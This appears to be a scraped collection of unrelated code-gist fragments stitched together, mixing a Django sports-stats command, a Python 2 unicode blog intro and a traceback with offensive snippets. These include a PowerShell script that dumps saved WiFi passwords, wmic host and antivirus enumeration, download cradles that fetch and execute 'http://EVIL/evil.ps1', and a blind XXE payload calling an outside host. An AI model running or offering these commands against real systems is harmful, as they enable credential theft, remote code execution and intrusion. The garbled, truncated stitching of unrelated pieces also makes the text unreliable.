| import traceback | |
| import logging | |
| import requests | |
| from django.core.management.base import BaseCommand, CommandError | |
| from apps.ufcstats.models import Fighter, Prediction, SportsBook, Odds, MLModel | |
| from django.conf import settings | |
| logger = logging.getLogger(__name__) | |
| # Fighter Alias Dict for storing name screw ups |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| # Run this script as an Admin user and get a list of all WiFi passwords. | |
| $listProfiles = netsh wlan show profiles | Select-String -Pattern "All User Profile" | %{ ($_ -split ":")[-1].Trim() }; | |
| $listProfiles | foreach { | |
| $profileInfo = netsh wlan show profiles name=$_ key="clear"; | |
| $SSID = $profileInfo | Select-String -Pattern "SSID Name" | %{ ($_ -split ":")[-1].Trim() }; | |
| $Key = $profileInfo | Select-String -Pattern "Key Content" | %{ ($_ -split ":")[-1].Trim() }; | |
| [PSCustomObject]@{ | |
| WifiProfileName = $SSID; | |
| Password = $Key | |
| } |
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
I know I'm late with this article for about 5 years or so, but people are still using Python 2.x, so this subject is relevant I think.
Some facts first:
str is an 8-bit string.unicode is for strings of unicode code points.
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
| #!/usr/bin/env python2 | |
| import SimpleHTTPServer | |
| import SocketServer | |
| import logging | |
| PORT = 8000 | |
| class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| GitHub RCE by Environment variable injection Bug Bounty writeup | |
| Disclaimer: I'll keep this really short but I hope you'll get the key points. | |
| GitHub blogged a while ago about some internal tool called gerve: | |
| https://github.com/blog/530-how-we-made-github-fast | |
| Upon git+sshing to github.com gerve basically looks up your permission | |
| on the repo you want to interact with. Then it bounces you further in | |
| another forced SSH session to the back end where the repo actually is. |
| /usr/bin/LANs.py 2 ↵ | |
| Traceback (most recent call last): | |
| File "/usr/bin/LANs.py", line 36, in <module> | |
| import nfqueue | |
| File "/usr/lib/python2.7/site-packages/nfqueue.py", line 28, in <module> | |
| _nfqueue = swig_import_helper() | |
| File "/usr/lib/python2.7/site-packages/nfqueue.py", line 24, in swig_import_helper | |
| _mod = imp.load_module('_nfqueue', fp, pathname, description) | |
| ImportError: dynamic module does not define init function (init_nfqueue) |
